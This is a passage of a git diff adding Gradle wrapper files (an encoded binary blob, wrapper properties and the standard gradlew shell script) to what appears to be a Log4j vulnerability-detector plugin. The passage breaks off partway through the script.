z6F}`d$r%33bw?G*azn*}Z;UMr{z4d9j~s`0*foZkUPwpJsGgoR0aF>&@DC;$A&(av
z?b|oo;`_jd>_5nye`D<obu&G!ftXK;)D(8NZ(rAyT3$Vi9gwp`#>VOcMLr-*Nw&nA
z82E8Dw^$Lpso)gEMh?N|Uc^X*NIhg=U%enuzZOGi-xcZRUZmkmq~(cP{S|*+A6P;Q
zprIkJkIl51@ng)8cR6QSXJtoa$AzT@*(zN3M+6`BTO~ZMo0`9$s;pg0HE3C;&;D@q
zd^0zcpT+jC%&=cYJF+j&uzX87d(gP9&kB9|-zN=69ymQS9_K@h3ph&wD5_!4q@qI@
zBMbd`2JJ2%yNX?`3(u&+nUUJLZ=|{t7^Rpw#v-pqD2_3}UEz!QazhRty%|Q~WCo7$
z+sIugHA%Lmm{lBP#bnu_>G}Ja<*6YOvSC;89z67M%iG0dagOt1HDpDn$<&H0DWxMU
zxOYaaks6%R@{`l~zlZ*~2}n53mn2|O&gE+j*^ypbrtBv{xd~G(NF?Z%F3>S6+qcry
z?ZdF9R*a;3lqX_!rI(Cov8ER_mOqSn6g&ZU(I|DHo7Jj`GJ}mF;T(vax`2+B8)H_D
zD0I;%I?*oGD616DsC#j0x*p+ZpBfd=9gR|TvB)832C<yhYAik<@H8~5#F6>R<A)^I
z813lsSPg>hsW_7g&WI@zp@r7dhg}{+4f=(cO2s+)jg0x(*6|^+6W_=YIfSH0lTcK*
z%)LyaOL6em@*-_u)}Swe8rU)~#zT-vNiW(D*~?Zp3NWl1y#fo!3sK-5Ek6F$F5l3|
zrFFD~WHz1}WHmzzZ!n&O8rTgfytJG*7iE~0`0;HGXgWTgx@2fD`oodipOM*MOWN-}
zJY-^>VMEi8v23ZlOn0NXp{7!QV3F1FY_URZjRK<l6h;TB{8A>McY(2PV_ms}EIC^x
z=EYB5UUQ{@R~$2Mwiw$_JAcF+szKB*<Pw8cE2gEj`x6sRWVOul$DOLM!NtNwjh^{(
zxfNtkDejs|AW>n(`MYpDCl>~ss54uDQ%Xf-8|dgO<D$o)tF6&E3o0(-+0v~XPcyB>
zY)B_qju=IaShS|XsQo=nSYxV$_vQR@hd~;qW)TEfU|BA0&-JSwO}-a*T;^}l;MgLM
zz}CjPlJX|W2vCzm3oHw3vqsRc3RY=2()}iw_k2#eKf&VEP7TQ;(<?;Dnz16vQ+EoX
z@YdXY3d=X;dXLc}GT10b@w?2#72%e6QoQ~Iso^XKa_A4FB-0kTb0gS}kCU)ekOmu4
z`X~-Y)K_*yRzFYC^5Ptoh0>DDzEAUgj!z_h2Br;Z3u=K~LqM6YOrlh)v9`!n|6M-s
z<LVy)p%e_Z0jAJF#}rF8BlQPu39Pb$)R=fT$F_oL3&Gro%^1<m;FD=A%JqXnheJY~
z0!=4l7633anV`XdE3ll;7?y>?XvA~y<5?WJ{+yM~uPh7uVM&g-(;IC3>uA}ud?B3F
zelSyc)Nx>(?F=H88O&_70%{<kvt?}pFSnnx$A+E#AvNZ=)Q67#lW<Bj=R~TC*34x<
zsIV$*icLF#lNv_`<!<@@H{3F&kUnVFe+}@wjNGQ{nYZ9?6}hda@t66<wlx96{_cE`
z$$a0j(_1tmoC?aiBGP^t4#2R1mY4;l4FmKUhoJ&lF<t;G=;U^CT{wVhc2vX(qHL;%
z-OQ&LUiC1Cq?IW2HC41#NaIch2w>ATsLVTAp88F-`+|egQ7C4rpIgOf;1tU1au+D3
zlz?k$jJtTOrl&B2%}D}8d=+$NINOZjY$lb{O<;oT<<w(P7-d7Q=?T(2)6S%4F4dsT
zi35lCeu|eW*ukuaYQn7hV8gDLi){5={4VyTorE0ZZjK<M1=NR{ZM!$i%JHC_!^QU0
zGv-ULw)i^~1DdoZqL(7f9gCW|Sy!yY)SNJoVu}g1?HCbB->zXoAp01KYG<PZ9H6O!
z))_mlm9Vu1mn+KG9d>$Y4*=)!&4g|FL(!54OhR-?)DXC&VS5E|1HGk8LY;)FRJqnz
zb_rV2F7=BGwHgDK&4J3{%&IK~rQx<&Kea|qEre;%A~5YD6x`mo>mdR)l?Nd%T2(5U
z_ciT02-zt_*C|vn?BYDuqSFrk3R(4B0M@CRFmG{5sovIq4%8AhjXA5UwRGo)MxZlI
zI%<!zxK{ej1*xOK@{q@yU&&2m0M<#J$s-)9nQJ#J9D$?MIi+@1qA-Ly$)60970|=L
z+)<dANvJ|$+x@*644bs*eF)w6b%Z+UpG@tteAy4c0qa=<nZV{kcyc?3DR^0UBf(tQ
zKVV;Sv@C}GZxNnStZ-+dFobV*{|x92_fZWDwisl5`v83Kseqc1BGi=gVi-fNboe{}
zDQ!10Gf30nF>vz`v8B+#ff*XtGnciczFG}l(I}{YuCco#2E6|+5WJ|>BSDfz0oT+F
z%QI^ixD|<Ire%}nK@2Aibp{~e4lq-hC}BRMRW9up0eGmQ%x;+z;N*J>^(AN`MS6J$
zXlKNTFhb>KDkJp*4*LaZ2WWA5YR~{`={F^hwXGG*rJYQA7kx|nwnC58!eogSIvy{F
zm1C#9@$LhK^Tl>&iM0wsnbG7Y^MnQ=q))MgApj4)DQt!Q5S`h+5a%c7M!m%)?+h65
z0NHDiEM^`W+<QZOD?Stcbud)jBUdJz>M4)=q^#sk(g!GTpB}edwIe>FJQ+jAbCo#b
zXmtd3raGJNH8vnqMtjem<_<RAJPF&-%GsWQ`YEcs5zd_a``?ag+n~zXrDsEJ{An$<
zo)|`>)9`gU_-RF&ZK!aIenv7B2Y0rZhon=2yh&VsHzM|`y|0x$Zez$bUg5Nqj?@~^
zPN43MB}q0kF&^=#3C;2T*bDBTyO(+#nZnULkVy0JcGJ36or7yl1wt7HI_>V7>mdud
zv2II9P61FyEXZuF$=69dn%Z6F;SOwyGL4<q<2ZxdTxZCB-(@VdZQg%XDDHH@cCjt3
zP;=X$AV;rcZN_7x<1S;3!mHBF>D5mKfW)q4l$8yUhv7|>>h_-4T*_CwAyu7;DW}_H
zo>N_7Gm6eed=UaiEp_7aZko@CC61@(E1be&5I9TUq%AOJW>s^9w%pR5g2{7HW9qyF
zh+ZvX;5}PN0!B4q2FUy+C#w5J?0Tkd&S#~94(AP4%fRb^742pgH7Tb1))siXWXHUT
z1Wn5C<yb=gsf8XFbOO5NR5v8J9|IBwD{uf)70TYaVeM&IZTi0M)$sw_JCuWq`=}b=
z8)W|q3IAjGL>G&!mGtr#jq6(P#!ck@K+FNprcWP?^wA2>mHA03W?kj>5b|P0ErXS)
zg2qDTjQ|grCgYhrH-RapWCvMq5vCa<vxi|F`?A!XHVHe)L4-tH;pd9Luqo?aPV!2s
z8*d5d)uG>F?{R%*mu}1)UDll~6;}<K4?1~CX;L1}g9u=o%>3Q*^QOfj!dlt02lSzK
z?+P)02Rrq``NbU3j&s*;<%i4Y>y9NK&=&KsYwvEmf5jwTG6?+Pu1q9M8lLlx)uZZ7
zizhr~e0ktGs-=$li-2jz^_48-jk**y&5u0`B2gc#i$T1~t+AS*kEfR*b{^Ec>2-F~
zKYRl&uQ5yO@EtAZX8ZSqx;8+AKf+CqhlUSpp*VfyBMv+%wxN5GukZEi^_to%MFRc0
zdXqJ*jk?#uYT6EJe446@(f6G4vhnxQP|pGeJ?-#|Ksq?g*ky=}x+Qnx+!<>Y(XStN
zQIND`{KU}&l)E*ntI^}kJ=ly8DML{!(58Xk4_bzIc@v~e;><z^97=`HZn*MMu&-Yg
z9OAP2=XoiJ9#|Bv1ibhQ?<i#4eQ8KaA1LcUI{C(jbJ_+e)%i?BCAr%VhAS6nBqnm&
zOKb5-QIs^)7Q^g>wKl_`7G%pGz~4KH*CTp;_|52)d!+ximd<F#sm2#+seBL|&Qg6U
zIH4|`rVu%b=4T?QFSuA{o^yZh^3fF1#a33<b;8dD%}OGkEXGV&tUFs68_~;DEn5o*
zhZd2`_dN1Q=^;r8BcE2oQQPvZJwW^cY1{+8&&E{!Lp-O4Y+%WZH;Bd)0e!Qy9ICrV
z)Gj&tR1KSz2R1ZAMXWdKQa?gzn)Js(jFRg>$|8v@zzEq%j68QXkgf$7eM~xdM5q5i
z{?qFx_W|eq@L03bW<UGBkQSwPH|s5CWgP#W8z%tU-Yz+j>Jfjy^z@()-iCjzjREuf
zb_a(yTz)ZKWCF%Lp>^2-%Q?*t{06}x#DLN3cO=i>h6#-a`z;<5rBGGM6GA(W<Lg(m
zm7?V_PW;n-_4B>qvRcX%Pn?Uvs1#e|ePSNJEC%+X(YI$x)`<aw5r?K?ufdtUbafv;
z1B#{SqMg66Z&7-Y0LFnjlW=}Nq{ztJ%nE?EXz`3b4cEBoJ5tdh4j`(po~Ft76f!ca
zUl9&xVkcY>s$%>O#%}D<Bxkxp>9dgqWfq4yfVz^%Fglo<Vpj$oQI(M`vqm^LsnI-r
zt^E2B$e1;rT?Mc7W`EHotX()0JY`gPQ@x=x)KDff#-DF|vIk(^5&pKNe6JswT{HWW
zFuclvp;&}aQJ8*m-TB?W)>kdFR}uJQhx|}_w`9Ulx38Ha>ZslKs58c-@IFI&f;?xM
zbK>rKNfPFsf>%+k6%(A6=7Aac^_qrOCNqb3ZVJ;8pt!?1DR*ynJb#@II9h?)xB)A~
zm9Kk)Hy}!Z+W}i6ZJDy+?yY_=#kWrzgV)2eZAx_E=}Nh7*#<&mQz`Umfe$+l^P(xd
zN}PA2qII4}ddCU+PN+yxkH%y!Qe(;iH3W%bwM3NKbU_saBo<8x9fGNtTAc_SizU=o
zC3n2;c%LoU^j90Sz>B_p--Fzqv7x7*?|~-x{haH8RP)p|^u$}S9pD-}5;88pu0J~9
zj}EC`Q^Fw}`^pvAs4qOIuxKvGN@DUdRQ8p-RXh=3S#<`3{+Qv6&nEm)uV|kRVnu6f
zco{(rJaWw(T0PWim?kkj9pJ)ZsUk9)dSNLDHf`y&@wbd;_ita>6RXFJ+8XC*-wsiN
z(HR|9IF283fn=DI#3Ze&#y3yS5;!yoIBAH(v}3p5_Zr+F99*%+)cp!Sy8e+lG?dOc
zuEz<;3X9Z5kkpL_ZYQa`sio<mu7#<R;P#^AzDZpNEFF-x6ISg?yJomJ7bPqcQ@V3r
zkdE38i3ZP3F@ZZPv}Ns~hi}3&z|z~Xe(PuXCDF99=C6$5T-)OJ35rFuX$2>R_@_cG
z8tT~GOSTWnO~#?$u)AcaBSaV7P~RT?Nn8(OSL1RmzPWRWQ$K2`6*)+&7^zZBeWzud
z*xb3|Fc~|R9eH+lQ#4wF#c;)Gka6lL(63C;>(bZob!i8F-3EhYU3|6-JBC0*5`y0|
zBs!Frs=s!Sy0qmQNgIH|F`6(SrD1js2prni_QbG9Sv@^Pu2szR9NZl8GU89gWWvVg
z2^-b*t+F{Nt>v?js7hnlC`tR<QFJb#1J-AD2Y_-!x0cUa7k-QE>U(an0qQG7;h6T~
z-`vf#R-AE$pzk`M{gCaia}F`->O<OWl)Ry@|N215RIbK)7oBxY(8>2)60AuGFAJg>
z*O2IZqTx=AzDvC49?A92>bQLdb&32_4>0Bgp0ESXXnd4B)!$<JlJM9H^R~a{?XOeJ
z<WSm_vo)2siYOYkAN5~Wm)}oOK5O{3aTYJ@>t$g{*FG%HYdt3b3a^J9#so%BJMyr2
z{y?rzW!><Q>lr097b9(75#&4&@lkB1vT*w&0E>!dS+a|ZOu6t^zro2tiP)bhcNNxn
zbJs3_Fz+?t;4bkd8GfDI7ccJ<q<OaN41j;vu2MUKpK*-OB+^@8|0UMdox>5zU`Bs~
zN~bci`c`a%DoCMel<-KUCBdZRmew`MbZEPYE|R#|*hhvhyhOL#9Yt7$g_)!X?fK^F
z8UDz)(zpsvriJ5aro5>qy`Fnz%;IR$@Kg3Z3EE!fv9CAdrAym6QU82=_$_N5*({_1
z7!-=zy(R<Q*94!ZMOOc>{xg9S519S6W{HpJZ8Is|kQ!0?`!vxDggmslD59)>iQ15f
z7J8NqdR<ga))e0)Ur%S+E}ec?+y~twFJ4A_Mss-AP+eF02kLp3zzFe*?#O4_dDZRy
zbv?H&>`9f8H|~iFGNsPV!N)(CC9JRmzL9S}7U-K@`X893f3f<8|8<l7zt!;mYl^FC
z=8SEE>Ls!^eA^#(O6nA+ByFIXcz_WLbfeG|nHJ5_sJJ^gNJ%SI9#XEfNRbzV+!RkI
zXS$MOVYb2!0vU}Gt7oUy*|WpF^*orBot~b2<Y_`8x!BAodNjWNH0hc3w0T6w{5sUZ
z|B2cC<DJgWDVgdP@mX(?FeHqs9Kvrhmw>J@^be?Gq;U%#a<fuYTr&+FHC3kSjUcEr
z1F>m8`PmH-UCFZ&uTJlnetYij0z{K1mmivk$bdPbLodu;-R@@#gAV!=d%(caz$E?r
zURX0pqAn7UuF6dULnoF1dZ$WM)t<Ee9jxt3VRL)Qt|k=L#J7L7eIPM4b7R6tK}kw`
zHvJihFn1ho^6Xt7)TuGkNxBs}tx(U%X%X=xQ`ylh2weAdzF7hIY+~jp76|mpcz0Z@
zGK0e2;cRTCq_nZ!Af@Z>HAM{eZK6DbU1J`V5<Z{7GK*`z#-439Xzh11z9N?3ixocB
zSP-RtvWs+6Vp`grGL8az-zi;6TP;MKqBV%8JdIbyz@d+w=tXA^^E62X5uQdV<T7<#
z7$$iHb4Gb1CEzftHC<QNnt*7os(xfMNgN<BkpflUzCR8rBH+;$KdU;oQRjSzM}Owi
zkxc2bytqB5!YVo6=u(rNUBNY<;6b_GhxbVQ<SZ-KWiYsio@tOFPJz0ma)S%jr{lVe
zmOHGx%qCf|iFEal|Mh34KB7kJZ|^w7YscJW1GAD%jIt<2a5&0^$BfFf{I^UOW1KW*
zA_2Q1M`8_By~1RuhkM|WdK&Rs<HLQEl{|fXX*sKo`HZA>Dw<;xk}Nl`h+nfMO_Rdv
z3SyOMzAbYaD;mkxA7_I_DOs#Bk;e5D%gsS3q)hlmi1w{FsjKNJE22`AjmNiAPRnIc
zcIkN25;rOn3FipAFd(PnlK9{03w6Q<(68#1Jw`{axEGQE{Ac>^U$<ZUy$k8K8eCOn
z#=x%Gb4$bF>h);h2ADICmaNxrfpb`Jdr*)Y1SicpYKCFv$3vf~;5aW>n^7QGa63MJ
z;B1+Z>WQ615R2D8JmmT`T{QcgZ+Kz1hTu{9FOL}Q8+iFx-Vyi}ZVVcGjTe>QfA`7W
zFoS__+;E_rQIQxd(Bq4$egKeKsk#-9=&A!)(|hBvydsr5ts0Zjp*%*C0lM2sIOx1s
zg$xz?Fh?x!P^!vWa|}^+SY8oZHub7f;E!S&Q;F?dZmvBxuFEISC}$^B_x*N-xRRJh
zn4W*ThEWaPD*$KBr8_?}XRhHY7h^U1aN6>m=n~?YJQd8+!Uyq_3^)~4>XjelM&!c9
zCo|0KsGq7!KsZ~9@%G?i>LaU7#uSTMpypocm*oqJHR|wOgVWc7_8PVuuw>x{kEG4T
z$p^DV`}jUK39zqFc(d5;N+M!Zd3zhZN&?Ww(<@AV-&f!<LI7*F8&iPDLUXltu(<}V
z$njn`XVpn?WJ*LB)uE)%4)wh=Ssn%11If>v$uV>%z+dg9((35o@4rqLvTC-se<GZ^
z@`nqI3i&X>@hkn^6k7+xHiK-vTRvM8{bCejbU;1@U=*r}GTI?Oc$!b6NRcj83-zF;
z=TB#ESDB`F`jf4)z=OS76Se}tQDDHh{VKJk#Ad6FDB_=afpK#pyRkGrk~OuzmQG)}
z*$t!nZu$KN&B;|O-aD=H<|n6aGGJZ=K9QFLG0y=Jye_ElJFNZJT;f<ekwWkA`guR1
z{-6+Q;C36hq*EaO#_dD=Ic~!kNe)DbJHR-5r$35y6?w=}fE@osSS>U8P8CZ<ru2E$
z&FfHRsx;HT;644Ji*zE#J;Iw#-X5!#zOw>cLBERjioAOC0Vz_pIXIc};)8HjfPwNy
zE!g|lkRv3qpmU?shz(BBt5%TbpJC3HzP9!t7k*Fh48!-HlJ4TTgdCr3rCU!iF}kgu
z4Qs;K@XOY~4f~N}Jl8V_mGbwzvNLbl&0e9UG4W;kvjTK|5`-Ld+eQ6YRF`N0ct%u%
z^3J_{7r#_W1zm|>IPN!yWCRrN)N!7v`~ptNkIXKipQ6ogFvcnI5ugxdoa{d;uD67g
zgo^}QuZRkB540Vc!@c80(wFG=$ct}oHq(#W0+-XX(;Rrt`x=<45X}ficNtI2(&}=~
zb(!}tNz?s`wm{g<VYvmC<DPs!Ffwi9p4hH_2+;OCs<0@Sl*DKhB3opORuW(|H@1FS
ze>K?2tdf+OEF;tzx<(3fMd7_tM@Ghs$Z(Os-H(kYq#qB|J-aC9Ku?fsWwJhB36c)A
zu|a7ZF?V8X<LT_AM+fJcpWO4|XIP|4e8O^HWt;P@;zk>7l2g5~xqZf>2=6Dsi5lfo
zKIRL&@MLJyaBE)V_9=pJYu%U2wxR*-(0MI5_|yqP`?h@cks(5LR@XUKLMI_xuVtiu
zRvpDS8MyUMRFM6`P+Sjc!A_e^H38Qu7b{b7QZ>NHyA6k-YYygQuW&C_OGO(<j^C?J
z61}&6UL&AH*ee~5X{4DF=YTk{e;k%C6cdMGz^_On5%_auAHK->7V7?}r)zedSVpBI
zuk29Z4GW3C0GpfozbZQya454sjt@ndQmsp=DA&@sWw&xmOlDk1JIcMNp~-ES$&A~k
zG#W(6hBj?!Fu8Q4WYexoSBa8_5=v20xnx6H?e;$t)5|f&{7=vOye^&3_c-Ug?|a@e
z=X`&qT_5B7N9vZoPBhXOTEDV;4&x2Je4}T(UB~O-$D#CjX77$R?RZ*`ed~$G;$4YS
z4n*|Pop(!NN79Hk2}U#cfEEwdxM)xQm}$~rV03xc=#U@@Y*}qEmot5KvDb=8{!E-n
zl4p?}&g2h^sUGyTcGh=0aQzQb*k;K;dvbeZUgmwEv>%#(EPtj=gHKdi|E8@w+|>KC
zxEU>b>P+9Xf}pEyQK(}#QrBG4Jaf!iE!qpMbTu>gb!<Yl`oJ2Qs~OjI2pYS$miOgf
z)oSAgm*%yXC(J_2Y^|lxT(Bj@)g{NCe_$2-#(IBW(>gtdq<`@xO+roQl+S_7)!G(%
zdy)$iGmJ1cwP?F=IyyV1-$|kf|EKM3B@I&lZ%NI@VV;*mQdLWjc#t|Vbk_Q~>&O03
zIcSr$(<C;?@SJ~enHTzBdHOa_kK%x}yPPx{Y@f-N;CqfpesVsIl6V%=e>qLAINj7a
z;!||v&1D5SX#X@5jNd}jUsi-CH_Scjyht&}q2p*CJCC-`&NyXf)vD5{e!HO629D-O
z%bZelTcq=DoRX>zeWCa^RmR3*{x9;3lZ75M#S)!W0bRIFH#P6b%{|HRSZ5!!I#s)W
z_|XXZQ<0_`>b^^0Z>LU64Yg1w)8}#M^9se(OZ9~baZ7fsKFc;EtnB>kesci#>=icG
zuHdjax2^=!_(9?0l7;G7^<S6vtx8KDwD(k*-}3X}*xp2~Q1QN_ey3mFbI>-}9>Y#M
zm;9*GT~dBuYWdk49%mZM0=H#FY1)}7NE5DE_vsqrA0`?0R0q535qHjWXcl|gz9Fq$
zMKxgL;68l!<x_iqb^g3P8sp{2wKCDUTct5DGCbp|qE`>gm3y0durIr3LHv~y*ABm`
zYhQG0UW#hg@*A{&G!;$FS43}rIF$e6yRdGJWVR<}uuJ_5_8qa3xaHH^!VzUteVp;>
z<0`M>3tnY$ZFb$(`0sg93TwGyP;`9UYUWxO&CvAnSzei&ap))NcW;R`tA=y^?<xF<
zJ6D(2{U$a%*dRJ!gY>mBmG+M*&bqW5kL$V(O;(p)aEk`^ci?2Jwxu>0sy>a7+Wa9t
z5#I2<E%eUDNU#8Q4p;zdEZ`amruvh;8KRi>o;+gr^9^&km^z7>xJWbN&Ft>Vna34E
zI@BBzwX)R}K3SL?)enrDJ45QLt;-7CFJk{`cF3L4Z^CtG_r5)0)HV>BOYPIUh#D%|
zYQAu31f{bm-D*`_k7DTTr?Nkw_gY%J1cb2&TdtibY?V=|SSIOlA;|5C!2@?Y<Jt;u
zTinN{+OAB61<CH4BTDj)y{EVI$2@cXn`zQ)eM(Dbn7!)2{+OWRfGx3V-oYUR*TG>Q
z-$?G0jj^mG|MP>DmbF7}T~C$H<GM1s9vtq{ctRL%)ku?lESW6RpB$5{h>6=CpZ~hd
zZ1C|xV@=h#^~`3LSCnmI(vZ|5r3>eq5*UB)dhdy``*gKY3Eg%jSK8I-`G+OWWlD)T
zt$wSQ=||lSkiKy}YF-k}@W9EiS?)z`hK{R!dd-$BCJvBtAN-yXn3njU$MisEtp!?Q
z%Vk-*(wy9dd15(-WFw_&^tT;;IpF?ox1`Qq3-0zVTk+$W_?q}GfAQlPcrB^?&tWSI
z2BB!K=sH7FUYmXa_dcV^Z3>5z8}~W{S!$j<QUfCP%Ei_-oejKF^4Px--@10AEb&&%
zqLhV;HtP}J?mNDW`>VR_3hu_|wl2|gmRH8ftn^z@fW75*;-`;wU+<qN{VVFPa<NJ=
z%5Tc^lT;~kS#GTR;uLu{UODRC`W1CjJDdMWF)yj9vSv5?EPGCP_CvxR<KVQ-ee^@d
z78utxn{J&uQMkX-;nbX#VhJS^U-x-G%_1q+m&vwTsVtWC=)Kmk)ap=ZslgW21X=O5
zOUYhn>fY+BR_yx6BZnE5_Hn<I7^Or<lw2y==ekF86`e-dVL;X`oN4E*Ej{e$8eW~9
zFj$ec3n$^oM&ZRdR&2#v#3~m#W`~$<;051(m(Jf=zQzdK;~#$hN`0a9c`p5??@+C@
zPeVp_&;r9RRci}cJlMLHOu2?574*VcMuRULYQ*CoWVc^hl7W#;r;q5FXFB;v*<w1q
zi{_E#wde=#Y3Y}v8)x>a({jrPiubRp$jZ=T=t$hx&NeCV1!vuCcl4PJ0p0Fjp>6K}
zHkoD1gQk=P2hYcT%)cJ2Q5WuA|5_x+dX0%hnozfTF>$#Wz~X!MY>){H4#fB#7^ID*
z1*o2Hzp}?WVs&gbS?Uq(CT0sP+F)u9{xfgg6o_{8J#m;|NeJqDHhb(Q8%z8aM_qeM
zn83>d`uDd47WIuKp78JBYo2SYupGcNXIzeou^eMY`@%Bv8elZ>q~3uq#~IX)g%g;h
zoUXymEd>|kVsMky<L3uw4pRyIQ~+QjmCB$4=YE<!$u9_OyX5)x^DXq?()o#LpIr_{
zIO?ELcmdP+iNjO_aw5V<2R$&_*Wtgt*?{*59BO<nICGdup!Efyall)FLM82-s;tU+
z`gtaxwVJ>b&1l~lrE-`w(0PObapYa35DJ4Y03Jv_!DKp}0HTbOgZRM=;PSsuAJJJ1
zItc+tu9;ANG;qHaCI|T85!euhFK~VK^G2LZV1+cbzS?>ar@>emg;JTI5VAn1g5U~|
zU=p&k0OlSzc$U=s#9_uL3&n|6A1X$XvrE9vFV@`A4G#!D1QcFCeE`F2N(deJx>)*A
z$XIW0P~-NbAd=5i6`s<~(vAQX9t$dbVqc5|E|CHRtb$1(l&KSNh_t2#k_l95KnP86
z)ns_DGspv-M0z0#h2a+*oH<N$Eg|T!fN8wzNHF)Gc7@I}fYSmF)d^g^wF0>|{5~j{
zXGD=}cLrBSESQ0u$XmQlFfWMCAW<k&T{2B`kEln2DqRfPZDN&P+#r+(TzPn03tzH#
zfZ(FO3Kgg2fV;0Q;3`k}(?hYs(1K|nDvXDyprC8Oy@>aS;wKK%#aSSYK=qljBiY(s
zT$v;We24&$w=avIILsMt0%1fDyah|AlLNg#WL$Lu)tf}YfqO%+pH~QC*bZO4aM*i9
zrPF<S6~WcOg5voiOp=#CCOjOQ5ZxCpF&rHeq3`w)NFVF}U|<Kw%7oEy^g#qo@fU`k
z7>f|5!hv@XY8CzaFh*Dy9vH|2fKKr(@x}`L#9^*vOae|lk`adG#oZZAyk|TOV8`9L
zc-sQu%y1MQes&J?)a1<kKqylWyJ0*WSp~sk!X}lCj~C^Y4HkkUA|OI7dnO5uEB_Sn
z5nw!Q?T_Gh?-hoJ-b!FB>}Zc*>-P!6j-T#<nXtbx!dw(1jQMR&Y09A*Y$c3P#bZUF
zPHij<7a#URMTBzWMHL#Yo-ub+SO9jPL<BMtMGz3;MF}gxj&z7pUy2AyBKgz7ny{%D
zqRCDbK~tE;7%T;wvLI45$3>75V$lLC!TuMB(!G-+D2;XptUxymSPFI-K&0x}B1?h$
z3-9**-9!);fwyiWB5gS$i;P~c<BV-!6?l&@qSAU=WR=lflY++!@J38Tpeg_V6qv5Y
z;7xFdRMlA#q^7MactaGzUwT0VzVPi)aKpfRNDwinqUps1w*|a<0AXIdIf?nLIwr3r
zfXfMg2!SyFs+pcC>=^}5-6G@{4<?gEpU8#(0(d$R(J6j7Ne3RyjvFOR^B9MxxDc5*
zF#j;kgcn?9US|F%QG-tcXAbk}L>TWDBRDc6(M|%qa-mS`z`u9kWo{Xl_uc;hXOkRd

literal 0
HcmV?d00001

diff --git a/community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.properties b/community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..622ab64a3
--- /dev/null
+++ b/community/detectors/log4j_rce/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,5 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/community/detectors/log4j_rce/gradlew b/community/detectors/log4j_rce/gradlew
new file mode 100755
index 000000000..fbd7c5158
--- /dev/null
+++ b/community/detectors/log4j_rce/gradlew
@@ -0,0 +1,185 @@
+#!/usr/bin/env sh
+
+#
+# Copyright 2015 the original author or authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+##############################################################################
+##
+##  Gradle start up script for UN*X
+##
+##############################################################################
+
+# Attempt to set APP_HOME
+# Resolve links: $0 may be a link
+PRG="$0"
+# Need this for relative symlinks.
+while [ -h "$PRG" ] ; do
+    ls=`ls -ld "$PRG"`
+    link=`expr "$ls" : '.*-> \(.*\)$'`
+    if expr "$link" : '/.*' > /dev/null; then
+        PRG="$link"
+    else
+        PRG=`dirname "$PRG"`"/$link"
+    fi
+done
+SAVED="`pwd`"
+cd "`dirname \"$PRG\"`/" >/dev/null
+APP_HOME="`pwd -P`"
+cd "$SAVED" >/dev/null
+
+APP_NAME="Gradle"
+APP_BASE_NAME=`basename "$0"`
+
+# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
+DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"'
+
+# Use the maximum available, or set MAX_FD != -1 to use that value.
+MAX_FD="maximum"
+
+warn () {
+    echo "$*"
+}
+
+die () {
+    echo
+    echo "$*"
+    echo
+    exit 1
+}
+
+# OS specific support (must be 'true' or 'false').
+cygwin=false
+msys=false
+darwin=false
+nonstop=false
+case "`uname`" in
+  CYGWIN* )
+    cygwin=true
+    ;;
+  Darwin* )
+    darwin=true
+    ;;
+  MINGW* )
+    msys=true
+    ;;
+  NONSTOP* )
+    nonstop=true
+    ;;
+esac
+
+CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
+
+
+# Determine the Java command to use to start the JVM.
+if [ -n "$JAVA_HOME" ] ; then
+    if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+        # IBM's JDK on AIX uses strange locations for the executables
+        JAVACMD="$JAVA_HOME/jre/sh/java"
+    else
+        JAVACMD="$JAVA_HOME/bin/java"
+    fi
+    if [ ! -x "$JAVACMD" ] ; then
+        die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+    fi
+else
+    JAVACMD="java"
+    which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+
+Please set the JAVA_HOME variable in your environment to match the
+location of your Java installation."
+fi
+
+# Increase the maximum file descriptors if we can.
+if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
+    MAX_FD_LIMIT=`ulimit -H -n`
+    if [ $? -eq 0 ] ; then
+        if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
+            MAX_FD="$MAX_FD_LIMIT"
+        fi
+        ulimit -n $MAX_FD
+        if [ $? -ne 0 ] ; then
+            warn "Could not set maximum file descriptor limit: $MAX_FD"
+        fi
+    else
+        warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
+    fi
+fi
+
+# For Darwin, add options to specify how the application appears in the dock
+if $darwin; then
+    GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
+fi
+
+# For Cygwin or MSYS, switch paths to Windows format before running java
+if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then
+    APP_HOME=`cygpath --path --mixed "$APP_HOME"`
+    CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
+    
+    JAVACMD=`cygpath --unix "$JAVACMD"`
+
+    # We build the pattern for arguments to be converted via cygpath
+    ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
+    SEP=""
+    for dir in $ROOTDIRSRAW ; do
+        ROOTDIRS="$ROOTDIRS$SEP$dir"
+        SEP="|"
+    done
+    OURCYGPATTERN="(^($ROOTDIRS))"
+    # Add a user-defined pattern to the cygpath arguments
+    if [ "$GRADLE_CYGPATTERN" != "" ] ; then
+        OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
+    fi
+    # Now convert the arguments - kludge to limit ourselves to /bin/sh
+    i=0
+    for arg in "$@" ; do
+        CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
